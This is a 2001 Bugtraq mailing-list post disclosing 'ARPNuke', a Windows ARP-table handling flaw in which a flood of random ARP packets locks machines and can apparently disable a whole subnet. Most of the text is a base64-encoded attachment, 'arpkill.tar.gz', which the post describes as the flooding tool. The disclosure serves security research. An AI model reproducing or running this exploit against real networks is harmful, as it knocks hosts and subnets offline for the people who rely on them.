[22003] in bugtraq
ARPNuke - 80 kb/s kills a whole subnet
daemon@ATHENA.MIT.EDU (Paul Starzetz)
Mon Jul 30 10:58:23 2001
Message-ID: <3B651DF6.B09F7F4B@starzetz.de>
Date: Mon, 30 Jul 2001 10:42:30 +0200
From: Paul Starzetz <paul@starzetz.de>
MIME-Version: 1.0
To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>,
"sphilipp@ix.urz.uni-heidelberg.de" <sphilipp@ix.urz.uni-heidelberg.de>
Content-Type: multipart/mixed;
boundary="------------5A43B2C6292EF92757F89F5A"
--------------5A43B2C6292EF92757F89F5A
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
Hi ppl,
It is time for a new =B4nuke=B4 - ARPNuke.
There is an ARP table handling bug in Microsoft Windows protocoll
stacks. It seems that the arp handling code uses some inefficient data
structure (maybe a simple linear table?) to manage the ARP entries.
Sending a huge amount of =B4random=B4 (that is random source IP and
arbitrary MAC) ARP packets results in 100% CPU utilization and a machine
lock up. The machine wakes up after the packets stream has been stopped.
The needed traffic is not really high: the attached ARPkill code will
send an initial sequence of about 10000 ARP packets, then go to =B4burst
mode=B4 sending definable short burst of random ARP packets every 10 msec=
=2E
The lockup occured at about 80kb/sec (seq about 45) on a PII/350.
Even worse: it seems that is possible to kill a whole subnet using
broadcast destination MAC (that is ff:ff:ff:ff:ff:ff) and arbitrary
source IP.
regards,
Ihq.
--------------5A43B2C6292EF92757F89F5A
Content-Type: application/x-gzip;
name="arpkill.tar.gz"
Content-Transfer-Encoding: base64
Content-Disposition: inline;
filename="arpkill.tar.gz"
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
AAA=
--------------5A43B2C6292EF92757F89F5A--
